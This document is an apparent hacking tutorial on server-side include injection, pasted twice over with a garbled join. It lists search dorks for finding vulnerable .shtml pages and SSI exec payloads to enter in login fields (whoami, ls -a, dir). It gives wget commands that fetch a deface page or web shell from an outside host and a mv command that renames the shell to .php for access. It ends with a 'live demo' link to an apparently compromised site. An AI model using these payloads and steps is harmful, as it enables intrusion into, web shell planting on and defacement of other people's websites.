SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites.
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin...
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password
<!--#echo var="DATE_LOCAL" -->
it Will show the Date
<!--#exec cmd="whoami"-->
it Will display which user is running on the server
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
it Will show all files in the directory
<!-- #exec cmd="dir" --> (Windows)
it Will display all files in the directory
for example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website
now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password
<!--#exec cmd="wget http://website.com/deface.html" -->
to view your deface page goto site.com/deface.html
to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget http://website.com/abc.txt" -->
to check your txt file is uploaded or not list all files using
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
now goto site.com/abc.php and acess your shell :)
live demo : http://www.fogstock.com/postinfo.html
http://www.fogstock.com/bin/Cklb
Server-side Include allowed you to upload files in multi extentions, but in .php extention you can't excute your shell, you have to rename shell.txt to shell.php
Lets Begin...
Dorks
inurl:bin/Cklb/inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulenrablity of websites enter these commands in username and password
<!--#echo var="DATE_LOCAL" -->
it Will show the Date
<!--#exec cmd="whoami"-->
it Will display which user is running on the server
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
it Will show all files in the directory
<!-- #exec cmd="dir" --> (Windows)
it Will display all files in the directory
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website
now we have to upload our deface page or shell
to upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in username and password
<!--#exec cmd="wget http://website.com/deface.html" -->
to view your deface page goto site.com/deface.html
to upload a shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget http://website.com/abc.txt" -->
to check your txt file is uploaded or not list all files using
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
now goto site.com/abc.php and acess your shell :)
live demo : http://www.fogstock.com/postinfo.html
http://www.fogstock.com/bin/Cklb